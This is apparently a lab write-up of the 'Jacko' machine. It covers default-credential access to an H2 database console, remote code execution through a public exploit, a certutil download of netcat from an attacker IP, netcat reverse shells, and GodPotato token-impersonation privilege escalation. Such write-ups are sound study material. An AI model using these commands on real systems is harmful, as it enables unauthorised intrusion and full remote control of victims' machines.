Jacko - Writeup - Konstantinovitz

## Enum - webserver - 80 - Landing page for H2 database engine - 445 - smb - - 8082 - H2 database web console - default credentials: `sa:` - version? -> `1.4.199 - (visible in admin GUI) - http://192.168.199.66:8082/login.do?jsessionid=75be359333ec58dfb870dd9c52666d74 ## Initial Access ![[Pasted image 20250606155618.png]] - default credentials - rce exploit for version `1.4.199` - `searchsploit -m 49384` Paste the following into console to achieve RCE: ``` -- Write native library SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', ....) -- full payload omitted, check the searchsploit file -- Load native library CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"; CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll'); -- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()'); ``` And we achieve RCE as `jacko\tony`. ## Foothold Download netcat binary: ``` -- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f \"http://192.168.45.209:8082/nc64.exe\" \"\\Users\\tony\\documents\\nc64.exe\"").getInputStream()).useDelimiter("\\Z").next()'); ``` Execute ``` -- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec(" \\Users\\tony\\documents\\nc64.exe 192.168.45.209 4444 -e cmd.exe").getInputStream()).useDelimiter("\\Z").next()'); ``` We get a shell callback and may now go and get the user flag. Need to use full binary paths: `\windows\system32`. ## Privesc - Executing `\windows\system32\whoami /priv` reveals the `SeImpersonatePrivilege`. - This enables us to perform a [[Windows Token Impersonation Attack]]. - We verify that the system `.NET` version is 4.0 using: `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"` - Load the [[God Potato]] executable onto the target - Start a netcat reverse shell listener - Use it to start a reverse shell: ``` .\godpotato.exe -cmd "\users\tony\documents\nc64.exe 192.168.45.209 4000 -e cmd" ``` Execute and profit. ## Lessons Learned - If missing binaries, go to `\windows\system32` - See [[Fixing Missing Windows Binaries]] - Took about an hour